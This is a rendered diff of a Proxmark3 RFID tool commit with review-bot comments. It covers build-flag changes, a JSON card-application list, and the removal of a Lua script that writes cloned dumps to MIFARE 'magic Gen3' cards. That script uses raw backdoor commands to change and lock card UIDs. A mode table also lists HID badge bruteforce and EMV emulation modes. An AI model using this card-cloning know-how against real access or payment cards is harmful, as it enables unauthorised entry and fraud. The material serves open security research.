set_property(SOURCE PROPERTY C_STANDARD 99)
## CPU-specific code
## These are mostly for x86-based architectures, which is not useful for many Android devices.
add_library(hardnested_nosimd OBJECT add_library(hardnested_nosimd OBJECT
hardnested/hardnested_bf_core.c hardnested/hardnested_bf_core.c
hardnested/hardnested_bitarray_core.c) hardnested/hardnested_bitarray_core.c)
target_compile_options(hardnested_nosimd PRIVATE -Wall -Werror -O3)
target_include_directories(hardnested_nosimd PRIVATE target_include_directories(hardnested_nosimd PRIVATE
../../common ../../common
../../include) ../../include)
target_compile_options(hardnested_nosimd PRIVATE -Wall -Werror -O3)
set(X86_CPUS x86 x86_64 i686) ## CPU-specific code
## These are mostly for x86-based architectures, which is not useful for many Android devices.
## Mingw platforms: AMD64
set(X86_CPUS x86 x86_64 i686 AMD64)
message(STATUS "CMAKE_SYSTEM_PROCESSOR := ${CMAKE_SYSTEM_PROCESSOR}") message(STATUS "CMAKE_SYSTEM_PROCESSOR := ${CMAKE_SYSTEM_PROCESSOR}")
if ("${CMAKE_SYSTEM_PROCESSOR}" IN_LIST X86_CPUS) if ("${CMAKE_SYSTEM_PROCESSOR}" IN_LIST X86_CPUS)
message(STATUS "Building optimised x86/x86_64 binaries") message(STATUS "Building optimised x86/x86_64 binaries")
target_compile_options(hardnested_nosimd BEFORE PRIVATE target_compile_options(hardnested_nosimd BEFORE PRIVATE
-mno-mmx -mno-sse2 -mno-avx -mno-avx2 -mno-avx512f) -mno-mmx -mno-sse2 -mno-avx -mno-avx2 -mno-avx512f)

View file

@ -1,6 +1,6 @@
MYSRCPATHS = MYSRCPATHS =
MYINCLUDES = -I../../../common -I../../../include -I../../src -I../jansson MYINCLUDES = -I../../../common -I../../../include -I../../src -I../jansson
MYCFLAGS = -std=c99 -D_ISOC99_SOURCE MYCFLAGS =
MYDEFS = MYDEFS =
MYSRCS = hardnested_bruteforce.c MYSRCS = hardnested_bruteforce.c
@ -24,7 +24,7 @@ MYOBJS += $(MULTIARCHSRCS:%.c=$(OBJDIR)/%_NOSIMD.o) \
$(MULTIARCHSRCS:%.c=$(OBJDIR)/%_AVX.o) \ $(MULTIARCHSRCS:%.c=$(OBJDIR)/%_AVX.o) \
$(MULTIARCHSRCS:%.c=$(OBJDIR)/%_AVX2.o) $(MULTIARCHSRCS:%.c=$(OBJDIR)/%_AVX2.o)
SUPPORTS_AVX512 := $(shell echo | gcc -E -mavx512f - > /dev/null 2>&1 && echo "True" ) SUPPORTS_AVX512 := $(shell echo | $(CC) -E -mavx512f - > /dev/null 2>&1 && echo "True" )
HARD_SWITCH_NOSIMD = -mno-mmx -mno-sse2 -mno-avx -mno-avx2 HARD_SWITCH_NOSIMD = -mno-mmx -mno-sse2 -mno-avx -mno-avx2
HARD_SWITCH_MMX = -mmmx -mno-sse2 -mno-avx -mno-avx2 HARD_SWITCH_MMX = -mmmx -mno-sse2 -mno-avx -mno-avx2

View file

@ -20,7 +20,7 @@
//----------------------------------------------------------------------------- //-----------------------------------------------------------------------------
// To compile it: // To compile it:
// gcc -std=c99 -I ../../common -o hardnested_tables hardnested_tables.c // gcc -I../../../common -I../../../include -o hardnested_tables hardnested_tables.c
#include <inttypes.h> #include <inttypes.h>
#include <stdbool.h> #include <stdbool.h>

View file

@ -1,5 +1,3 @@
set_property(SOURCE PROPERTY C_STANDARD 99)
add_library(jansson STATIC add_library(jansson STATIC
jansson/dump.c jansson/dump.c
jansson/error.c jansson/error.c

View file

@ -1,6 +1,6 @@
MYSRCPATHS = MYSRCPATHS =
MYINCLUDES = -I. MYINCLUDES = -I.
MYCFLAGS = -std=c99 -D_ISOC99_SOURCE -Wno-unused-function MYCFLAGS = -Wno-unused-function
MYDEFS = -DHAVE_STDINT_H MYDEFS = -DHAVE_STDINT_H
MYSRCS = \ MYSRCS = \
dump.c \ dump.c \

View file

@ -1,7 +1,6 @@
MYSRCPATHS = MYSRCPATHS =
MYINCLUDES = -I. MYINCLUDES = -I.
# Lua lib is not ready for C99 style... # Lua lib requires GNU extensions (implicit declarations of functions): -std=gnu99 or -std=gnu11
#MYCFLAGS = -std=c99 -D_ISOC99_SOURCE
MYCFLAGS = MYCFLAGS =
MYDEFS = -DLUA_COMPAT_ALL $(SYSCFLAGS) MYDEFS = -DLUA_COMPAT_ALL $(SYSCFLAGS)
MYSRCS = lapi.c lcode.c lctype.c ldebug.c ldo.c ldump.c lfunc.c lgc.c llex.c \ MYSRCS = lapi.c lcode.c lctype.c ldebug.c ldo.c ldump.c lfunc.c lgc.c llex.c \
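Review bot: The replacement comment says the Lua sources need GNU extensions (`-std=gnu99` or `-std=gnu11`), yet `MYCFLAGS =` stays empty, so the build depends on whatever dialect the compiler defaults to. If the requirement is real, set it explicitly (`MYCFLAGS = -std=gnu99`) so a toolchain with a different default, or a user-supplied `CFLAGS` carrying `-std=c99`, does not break this library. If it is only informational, reword the comment to say that no `-std` is passed on purpose.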

View file

@ -1,5 +1,3 @@
set_property(SOURCE PROPERTY C_STANDARD 99)
add_library(mbedtls STATIC add_library(mbedtls STATIC
../../common/mbedtls/aes.c ../../common/mbedtls/aes.c
../../common/mbedtls/asn1parse.c ../../common/mbedtls/asn1parse.c

View file

@ -1,5 +1,3 @@
set_property(SOURCE PROPERTY C_STANDARD 99)
add_library(reveng STATIC add_library(reveng STATIC
reveng/bmpbit.c reveng/bmpbit.c
reveng/cli.c reveng/cli.c

View file

@ -5,7 +5,7 @@
MYSRCPATHS = MYSRCPATHS =
MYINCLUDES = -I../cliparser MYINCLUDES = -I../cliparser
MYCFLAGS = -std=c99 -D_ISOC99_SOURCE MYCFLAGS =
MYDEFS = -DPRESETS MYDEFS = -DPRESETS
MYSRCS = \ MYSRCS = \
bmpbit.c \ bmpbit.c \

View file

@ -1,7 +1,6 @@
MYSRCPATHS = MYSRCPATHS =
MYINCLUDES = MYINCLUDES =
# Strange errors on Mingw when compiling with C99 # Strange errors on Mingw when compiling with C99
#MYCFLAGS = -std=c99 -D_ISOC99_SOURCE
MYCFLAGS = MYCFLAGS =
MYDEFS = MYDEFS =
MYSRCS = \ MYSRCS = \

View file

@ -1,5 +1,3 @@
set_property(SOURCE PROPERTY C_STANDARD 99)
add_library(z STATIC add_library(z STATIC
../../common/zlib/deflate.c ../../common/zlib/deflate.c
../../common/zlib/adler32.c ../../common/zlib/adler32.c

View file

@ -1,390 +0,0 @@
local utils = require('utils')
local getopt = require('getopt')
local cmds = require('commands')
local read14a = require('read14a')
--
---
-------------------------------
-- Notes
-------------------------------
---
--
--[[
---Suggestions of improvement:
--- Add support another types of dumps: BIN, JSON
--- Maybe it will be not only as `mfc_gen3_writer`, like a universal dump manager.
--- Add undependence from the operation system. At the moment code not working in Linux.
--- Add more chinesse backdoors RAW commands for UID changing (find RAW for the 4 byte familiar chinese card, from native it soft: http://bit.ly/39VIDsU)
--- Hide system messages when you writing a dumps, replace it to some of like [#####----------] 40%
-- iceman notes:
-- doesn't take consideration filepaths for dump files.
-- doesn't allow A keys for authenticating when writing
-- doesn't verify that card is magic gen3.
-- doesn't take several versions of same dump ( -1, -2, -3 ) styles.
--]]
--
---
-------------------------------
-- Script hat
-------------------------------
---
--
copyright = ''
author = 'Winds'
version = 'v1.0.0'
desc = [[
The script gives you a easy way to write your *.eml dumps onto normal MFC and magic Gen3 cards.
Works with both 4 and 7 bytes NXP MIFARE Classic 1K cards.
The script also has the possibility to change UID and permanent lock uid on magic Gen3 cards.
It supports the following functionality.
1. Write it to the same of current card UID.
2. Write it to magic Gen3 card.
3. Change uid to match dump on magic Gen3 card.
4. Permanent lock UID on magic Gen3 card.
5. Erase all data at the card and set the FF FF FF FF FF FF keys, and Access Conditions to 78778800.
Script works in a wizard styled way.
]]
example = [[
1. script run mfc_gen3_writer
]]
usage = [[
Select your *.eml dump from list to write to the card.
]]
--
---
-------------------------------
-- Global variables
-------------------------------
---
--
local DEBUG = false -- the debug flag
local files = {} -- Array for eml files
local b_keys = {} -- Array for B keys
local eml = {} -- Array for data in block 32
local num_dumps = 0 -- num of found eml dump files
local tab = string.rep('-', 64)
local empty = string.rep('0', 32) -- Writing blocks
local default_key = 'FFFFFFFFFFFF' -- Writing blocks
local default_key_type = '01' --KeyA: 00, KeyB: 01
local default_key_blk = 'FFFFFFFFFFFF78778800FFFFFFFFFFFF' -- Writing blocks
local piswords_uid_lock = 'hf 14a raw -s -c -t 2000 90fd111100'
local piswords_uid_change = 'hf 14a raw -s -c -t 2000 90f0cccc10'
local cmd_wrbl = 'hf mf wrbl %d B %s %s' -- Writing blocks
--
---
-------------------------------
-- A debug printout-function
-------------------------------
---
--
local function dbg(args)
if not DEBUG then return end
if type(args) == 'table' then
local i = 1
while args[i] do
dbg(args[i])
i = i+1
end
else
print('###', args)
end
end
--
---
-------------------------------
-- This is only meant to be used when errors occur
-------------------------------
---
--
local function oops(err)
print('ERROR:', err)
core.clearCommandBuffer()
return nil, err
end
--
---
-------------------------------
-- Usage help
-------------------------------
---
--
local function help()
print(copyright)
print(author)
print(version)
print(desc)
print('Example usage')
print(example)
print(usage)
end
--
---
-------------------------------
-- GetUID
-------------------------------
---
--
local function GetUID()
return read14a.read(true, true).uid
end
--
local function dropfield()
read14a.disconnect()
core.clearCommandBuffer()
end
--
---
-------------------------------
-- Wait for tag (MFC)
-------------------------------
---
--
local function wait()
read14a.waitFor14443a()
end
--
---
-------------------------------
-- Return key code 00/01 to string
-------------------------------
---
--
local function KeyAB()
if default_key_type == '00' then
return 'KeyA'
else
return 'KeyB'
end
end
--
---
-------------------------------
-- Check response from Proxmark
-------------------------------
---
--
local function getblockdata(response)
if response.Status == 0 then
return true
else
return false
end
end
--
---
-------------------------------
-- Check 0xFFFFFFFFFFFF key for tag (MFC)
-------------------------------
---
--
local function checkkey()
local status = 0
for i = 1, #eml do
cmd = Command:newNG{cmd = cmds.CMD_HF_MIFARE_READBL, data = ('%02x%02x%s'):format((i-1), default_key_type, default_key)}
if (getblockdata(cmd:sendNG(false)) == true) then
status = status + 1
print(('%s %02s %s %s %s'):format(' ', (i-1), KeyAB(), default_key, 'OK'))
else
break
end
end
if status == #eml then
return true
end
end
--
---
-------------------------------
-- Check Pissword backdor
-------------------------------
---
--
local function checkmagic()
--Have no RAW ISO14443A command in appmain.c
cmd = Command:newNG{cmd = cmds.CMD_HF_ISO14443A_READER, data = piswords_uid_change .. GetUID()} -- sample check to pull the same UID to card and check response
if (getblockdata(cmd:sendNG(false)) == true) then
print('Magic')
else
print('Not magic')
end
end
--
---
-------------------------------
-- Main function
-------------------------------
---
--
local function main(args)
--
---
-------------------------------
-- Arguments for script
-------------------------------
---
--
for o, a in getopt.getopt(args, 'hd') do
if o == 'h' then return help() end
if o == 'd' then DEBUG = true end
end
--
wait()
print(tab)
--
---
-------------------------------
-- Detect 7/4 byte card
-------------------------------
---
--
if string.len(GetUID()) == 14 then
eml_file_uid_start = 18 -- For windows with '---------- ' prefix
eml_file_uid_end = 31
eml_file_lengt = 40
else
eml_file_uid_start = 18 -- For windows with '---------- ' prefix
eml_file_uid_end = 25
eml_file_lengt = 34
end
dropfield()
--
---
-------------------------------
-- List all EML files in /client
-------------------------------
---
--
local dumpEML = 'find "." "*dump.eml"' -- Fixed for windows
local p = assert(io.popen(dumpEML))
for _ in p:lines() do
-- The length of eml file
if string.len(_) == eml_file_lengt then
num_dumps = num_dumps + 1
-- cut UID from eml file
files[num_dumps] = string.sub(_, eml_file_uid_start, eml_file_uid_end) -- cut numeretic UID
print(' '..num_dumps..' | '..files[num_dumps])
end
end
--
p.close()
--
if num_dumps == 0 then return oops("Didn't find any dump files") end
--
print(tab)
print(' Your card has UID '..GetUID())
print('')
print(' Select which dump to write (1 until '..num_dumps..')')
print(tab)
io.write(' --> ')
--
local uid_no = tonumber(io.read())
print(tab)
print(' You have been selected card dump No ' .. uid_no .. ', with UID: ' .. files[uid_no] .. '. Your card UID: ' .. GetUID())
--
--
---
-------------------------------
-- Load eml file
-------------------------------
---
--
local dumpfile = assert(io.open('./hf-mf-' .. files[uid_no] .. '-dump.eml', 'r'))
for _ in dumpfile:lines() do table.insert(eml, _); end
dumpfile.close()
--
---
-------------------------------
-- Extract B key from EML file
-------------------------------
---
--
local b = 0
for i = 1, #eml do
if (i % 4 == 0) then
repeat
b = b + 1
-- Cut key from block
b_keys[b] = string.sub(eml[i], (#eml[i] - 11), #eml[i])
until b % 4 == 0
end
end
print(tab)
dbg(b_keys)
dbg(eml)
--
---
-------------------------------
-- Change UID on certain version of magic Gen3 card.
-------------------------------
---
--
if (utils.confirm(' Change UID ?') == true) then
wait()
core.console(piswords_uid_change .. tostring(eml[1]))
print(tab)
print(' The new card UID : ' .. GetUID())
end
print(tab)
--checkmagic()
--
---
-------------------------------
-- Lock UID
-------------------------------
---
--
if (utils.confirm(' Permanent lock UID ? (card can never change uid again) ') == true) then
wait()
core.console(piswords_uid_lock)
end
--
print(tab)
print(' Going to check the all ' .. KeyAB() .. ' by ' .. default_key)
print(tab)
--
if checkkey() == true then
print(tab)
if (utils.confirm(' Card is Empty. Write selected dump to card ?') == true) then
for i = 1, #eml do
core.console(string.format(cmd_wrbl, (i-1), default_key, eml[i]))
end
end
else
print(tab)
if (utils.confirm(' Delete ALL data and write all keys to 0x' .. default_key .. ' ?') == true) then
wait()
for i = 1, #eml do
if (i % 4 == 0) then
core.console(string.format(cmd_wrbl, (i-1), b_keys[i], default_key_blk))
else
core.console(string.format(cmd_wrbl, (i-1), b_keys[i], empty))
end
end
else
print(tab)
if (utils.confirm(' Write selected dump to card ?') == true) then
print(tab)
wait()
for i = 1, #eml do
core.console(string.format(cmd_wrbl, (i-1), b_keys[i], eml[i]))
end
end
end
end
dropfield()
print(tab)
print('You are welcome')
end
--
---
-------------------------------
-- Start Main function
-------------------------------
---
--
main(args)
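Review bot: `p.close()` after the EML listing loop and `dumpfile.close()` after the load loop call the close method with a dot, so no handle is passed; both should use the colon form, `p:close()` and `dumpfile:close()`. Separately, `local uid_no = tonumber(io.read())` is used unchecked as an index into `files`: non-numeric input gives nil and an out-of-range number gives a nil entry, and either way the following `print` fails on concatenation before `io.open` is reached. Check that `uid_no` is an integer between 1 and `num_dumps` and return through `oops()` otherwise. The fixed offsets `eml_file_uid_start`/`eml_file_uid_end` also assume one exact output format from `find`; matching the UID out of the file name with a pattern would be less fragile.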

View file

@ -122,17 +122,17 @@ FFFFFF General Issuer Information (FIDs 00: MAD Version; 01: Card Holder; 02: Ca
}, },
{ {
"AID": "F518F0", "AID": "F518F0",
"Vendor": "TELENOT", "Vendor": "Telenot Electronic GmbH",
"Country": "DE", "Country": "DE",
"Name": "TELENOT Tag", "Name": "Telenot Tag",
"Description": "", "Description": "",
"Type": "alarm system" "Type": "alarm system"
}, },
{ {
"AID": "F38091", "AID": "F38091",
"Vendor": "MICROTRONIC", "Vendor": "Microtronic AG",
"Country": "CH", "Country": "CH",
"Name": "MICROTRONIC Tag", "Name": "Microtronic Tag",
"Description": "", "Description": "",
"Type": "payment system" "Type": "payment system"
}, },
@ -256,5 +256,62 @@ FFFFFF General Issuer Information (FIDs 00: MAD Version; 01: Card Holder; 02: Ca
"Name": "BAT", "Name": "BAT",
"Description": "", "Description": "",
"Type": "transport" "Type": "transport"
}, },
{
"AID": "05845F",
"Vendor": "InterCard GmbH Kartensysteme",
"Country": "DE",
"Name": "InterCard",
"Description": "Campus Card",
"Type": "student"
},
{
"AID": "15845F",
"Vendor": "InterCard GmbH Kartensysteme",
"Country": "DE",
"Name": "InterCard",
"Description": "Campus Card",
"Type": "student"
},
{
"AID": "25845F",
"Vendor": "InterCard GmbH Kartensysteme",
"Country": "DE",
"Name": "InterCard",
"Description": "Campus Card",
"Type": "student"
},
{
"AID": "35845F",
"Vendor": "InterCard GmbH Kartensysteme",
"Country": "DE",
"Name": "InterCard",
"Description": "Campus Card",
"Type": "student"
},
{
"AID": "55845F",
"Vendor": "InterCard GmbH Kartensysteme",
"Country": "DE",
"Name": "InterCard",
"Description": "Campus Card",
"Type": "student"
},
{
"AID": "65845F",
"Vendor": "InterCard GmbH Kartensysteme",
"Country": "DE",
"Name": "InterCard",
"Description": "Campus Card",
"Type": "student"
},
{
"AID": "75845F",
"Vendor": "InterCard GmbH Kartensysteme",
"Country": "DE",
"Name": "InterCard",
"Description": "Campus Card",
"Type": "student"
},
} }
]
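Review bot: as rendered here, the last added InterCard entry ends with `},` and is followed directly by the context lines `}` and `]`, which would leave a trailing comma and an unmatched brace in the array. Please confirm the resulting file still parses as JSON, for example by running it through a JSON parser as part of the build checks. The seven new entries differ only in their `AID`; if they are distinct applications of one campus card, a short `Description` per AID would make the lookup output more useful.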

View file

@ -10,6 +10,7 @@
//----------------------------------------------------------------------------- //-----------------------------------------------------------------------------
#include "crypto/libpcrypto.h" #include "crypto/libpcrypto.h"
#include "crypto/asn1utils.h"
#include <stdlib.h> #include <stdlib.h>
#include <unistd.h> #include <unistd.h>
#include <string.h> #include <string.h>
@ -23,7 +24,6 @@
#include <mbedtls/ctr_drbg.h> #include <mbedtls/ctr_drbg.h>
#include <mbedtls/entropy.h> #include <mbedtls/entropy.h>
#include <mbedtls/error.h> #include <mbedtls/error.h>
#include <crypto/asn1utils.h>
#include <util.h> #include <util.h>
// NIST Special Publication 800-38A — Recommendation for block cipher modes of operation: methods and techniques, 2001. // NIST Special Publication 800-38A — Recommendation for block cipher modes of operation: methods and techniques, 2001.

View file

@ -117,7 +117,7 @@ static const char *prompt_dev = "";
static const char *prompt_ctx = ""; static const char *prompt_ctx = "";
static void prompt_compose(char *buf, size_t buflen, const char *prompt_ctx, const char *prompt_dev) { static void prompt_compose(char *buf, size_t buflen, const char *prompt_ctx, const char *prompt_dev) {
snprintf(buf, buflen-1, PROXPROMPT_COMPOSE, prompt_dev, prompt_ctx); snprintf(buf, buflen - 1, PROXPROMPT_COMPOSE, prompt_dev, prompt_ctx);
} }
static int check_comm(void) { static int check_comm(void) {
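Review bot: in `prompt_compose`, `snprintf(buf, buflen - 1, ...)` passes one less than the buffer size, but snprintf already counts the terminating NUL within its size argument, so the call should pass `buflen`. Because `buflen` is a `size_t`, a caller passing 0 turns `buflen - 1` into the maximum value and the write is no longer bounded. Since this line is being touched anyway, fix the argument rather than only the spacing.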
@ -187,8 +187,6 @@ main_loop(char *script_cmds_file, char *script_cmd, bool stayInCommandLoop) {
bool stdinOnPipe = !isatty(STDIN_FILENO); bool stdinOnPipe = !isatty(STDIN_FILENO);
char script_cmd_buf[256] = {0x00}; // iceman, needs lua script the same file_path_buffer as the rest char script_cmd_buf[256] = {0x00}; // iceman, needs lua script the same file_path_buffer as the rest
PrintAndLogEx(DEBUG, "ISATTY/STDIN_FILENO == %s\n", (stdinOnPipe) ? "true" : "false");
if (session.pm3_present) { if (session.pm3_present) {
// cache Version information now: // cache Version information now:
if (execCommand || script_cmds_file || stdinOnPipe) if (execCommand || script_cmds_file || stdinOnPipe)

View file

@ -1,6 +1,6 @@
MYSRCPATHS = MYSRCPATHS =
MYINCLUDES = -I. -I.. MYINCLUDES = -I. -I..
MYCFLAGS = -std=c99 -D_ISOC99_SOURCE MYCFLAGS =
MYDEFS = MYDEFS =
MYSRCS = \ MYSRCS = \
aes.c \ aes.c \
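Review bot: `MYCFLAGS` is emptied here with no replacement, while the mfkey and nonce2key Makefiles in this same commit re-add `-D_ISOC99_SOURCE` under a `MINGW` platform check. If the sources built here use C99 printf formats such as `%z`, this directory needs the same guard; if they do not, a one-line comment saying so would explain why the two cases are handled differently. Dropping `-std=c99` also leaves the C dialect to whatever the included host Makefile or the compiler default provides, which is worth stating in the commit message.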

View file

@ -1,7 +1,7 @@
MYSRCPATHS = ../../common/zlib MYSRCPATHS = ../../common/zlib
MYSRCS = deflate.c adler32.c trees.c zutil.c inflate.c inffast.c inftrees.c MYSRCS = deflate.c adler32.c trees.c zutil.c inflate.c inffast.c inftrees.c
MYINCLUDES = -I../../common/zlib MYINCLUDES = -I../../common/zlib
MYCFLAGS = -std=c99 -D_ISOC99_SOURCE MYCFLAGS =
MYDEFS = -DZ_SOLO -DNO_GZIP -DZLIB_PM3_TUNED MYDEFS = -DZ_SOLO -DNO_GZIP -DZLIB_PM3_TUNED
#-DDEBUG -Dverbose=1 #-DDEBUG -Dverbose=1

View file

@ -72,21 +72,22 @@ Here are the supported values you can assign to `STANDALONE` in `Makefile.platfo
| STANDALONE | DESCRIPTION | | STANDALONE | DESCRIPTION |
|-----------------|----------------------------------------| |-----------------|----------------------------------------|
| | No standalone mode | | No standalone mode
| LF_SAMYRUN (def)| HID26 read/clone/sim - Samy Kamkar | LF_SKELETON | standalone mode skeleton - Iceman
| LF_ICERUN | standalone mode skeleton - Iceman | LF_EM4100EMUL | LF EM4100 simulator standalone mode - temskiy
| LF_PROXBRUTE | HID ProxII bruteforce - Brad Antoniewicz
| LF_HIDBRUTE | HID corporate 1000 bruteforce - Federico dotta & Maurizio Agazzini
| HF_YOUNG | Mifare sniff/simulation - Craig Young
| HF_MATTYRUN | Mifare sniff/clone - Matías A. Ré Medina
| HF_COLIN | Mifare ultra fast sniff/sim/clone - Colin Brigato
| HF_BOG | 14a sniff with ULC/ULEV1/NTAG auth storing in flashmem - Bogito
| HF_14ASNIFF | 14a sniff storing to flashmem - Micolous
| LF_ICEHID | LF HID collector to flashmem - Iceman
| LF_EM4100EMUL | LF EM4100 simulator standalone mode - temskiy
| LF_EM4100RWC | LF EM4100 read/write/clone mode - temskiy | LF_EM4100RWC | LF EM4100 read/write/clone mode - temskiy
| LF_HIDBRUTE | HID corporate 1000 bruteforce - Federico dotta & Maurizio Agazzini
| LF_ICEHID | LF HID collector to flashmem - Iceman
| LF_PROXBRUTE | HID ProxII bruteforce - Brad Antoniewicz
| LF_SAMYRUN | HID26 read/clone/sim - Samy Kamkar
| HF_14ASNIFF | 14a sniff storing to flashmem - Micolous
| HF_BOG | 14a sniff with ULC/ULEV1/NTAG auth storing in flashmem - Bogito
| HF_COLIN | Mifare ultra fast sniff/sim/clone - Colin Brigato
| HF_LEGIC | HF Legic Prime standalone - uhei | HF_LEGIC | HF Legic Prime standalone - uhei
| HF_MATTYRUN | Mifare sniff/clone - Matías A. Ré Medina
| HF_MSDSAL (def)| EMV Read and emulation - Salvador Mendoza
| HF_YOUNG | Mifare sniff/simulation - Craig Young
By default `STANDALONE=LF_SAMYRUN`. By default `STANDALONE=HF_MSDSAL`.
## Next step ## Next step
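Review bot: the default moves from `STANDALONE=LF_SAMYRUN` to `STANDALONE=HF_MSDSAL`, so a firmware built without a `Makefile.platform` override now ships an EMV read-and-emulate mode instead of the HID26 one; that is a user-visible behaviour change and should be called out in the changelog, not only in this table. `LF_ICERUN` is also renamed to `LF_SKELETON`, which breaks existing `Makefile.platform` files that still set the old name; either keep the old value as an alias or document the rename. The `(def)` marker in the table and the "By default" sentence duplicate the value set in the Makefile, so all three need to be updated together.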

View file

@ -1,7 +1,7 @@
MYSRCPATHS = ../../common ../../common/crapto1 MYSRCPATHS = ../../common ../../common/crapto1
MYSRCS = crypto1.c crapto1.c bucketsort.c MYSRCS = crypto1.c crapto1.c bucketsort.c
MYINCLUDES = -I../../include -I../../common MYINCLUDES = -I../../include -I../../common
MYCFLAGS = -std=c99 -D_ISOC99_SOURCE MYCFLAGS =
MYDEFS = MYDEFS =
BINS = mfkey32 mfkey32v2 mfkey64 BINS = mfkey32 mfkey32v2 mfkey64
@ -9,6 +9,13 @@ INSTALLTOOLS = $(BINS)
include ../../Makefile.host include ../../Makefile.host
# checking platform can be done only after Makefile.host
ifneq (,$(findstring MINGW,$(platform)))
# Mingw uses by default Microsoft printf, we want the GNU printf (e.g. for %z)
# and setting _ISOC99_SOURCE sets internally __USE_MINGW_ANSI_STDIO=1
CFLAGS += -D_ISOC99_SOURCE
endif
mfkey32 : $(OBJDIR)/mfkey32.o $(MYOBJS) mfkey32 : $(OBJDIR)/mfkey32.o $(MYOBJS)
mfkey32v2 : $(OBJDIR)/mfkey32v2.o $(MYOBJS) mfkey32v2 : $(OBJDIR)/mfkey32v2.o $(MYOBJS)
mfkey64 : $(OBJDIR)/mfkey64.o $(MYOBJS) mfkey64 : $(OBJDIR)/mfkey64.o $(MYOBJS)
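Review bot: the added `ifneq (,$(findstring MINGW,$(platform)))` block relies on `-D_ISOC99_SOURCE` setting `__USE_MINGW_ANSI_STDIO=1` as a side effect, as its own comment says; defining `-D__USE_MINGW_ANSI_STDIO=1` directly would state the intent and not depend on header internals. The identical block is added to the nonce2key Makefile in this commit as well, so it would be better placed once in `Makefile.host`, after `platform` is set, than copied into each tool's Makefile.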

View file

@ -1,7 +1,7 @@
MYSRCPATHS = ../../common ../../common/crapto1 MYSRCPATHS = ../../common ../../common/crapto1
MYSRCS = crypto1.c crapto1.c bucketsort.c MYSRCS = crypto1.c crapto1.c bucketsort.c
MYINCLUDES = -I../../include -I../../common MYINCLUDES = -I../../include -I../../common
MYCFLAGS = -std=c99 -D_ISOC99_SOURCE MYCFLAGS =
MYDEFS = MYDEFS =
BINS = nonce2key BINS = nonce2key
@ -9,4 +9,11 @@ INSTALLTOOLS = $(BINS)
include ../../Makefile.host include ../../Makefile.host
# checking platform can be done only after Makefile.host
ifneq (,$(findstring MINGW,$(platform)))
# Mingw uses by default Microsoft printf, we want the GNU printf (e.g. for %z)
# and setting _ISOC99_SOURCE sets internally __USE_MINGW_ANSI_STDIO=1
CFLAGS += -D_ISOC99_SOURCE
endif
nonce2key : $(OBJDIR)/nonce2key.o $(MYOBJS) nonce2key : $(OBJDIR)/nonce2key.o $(MYOBJS)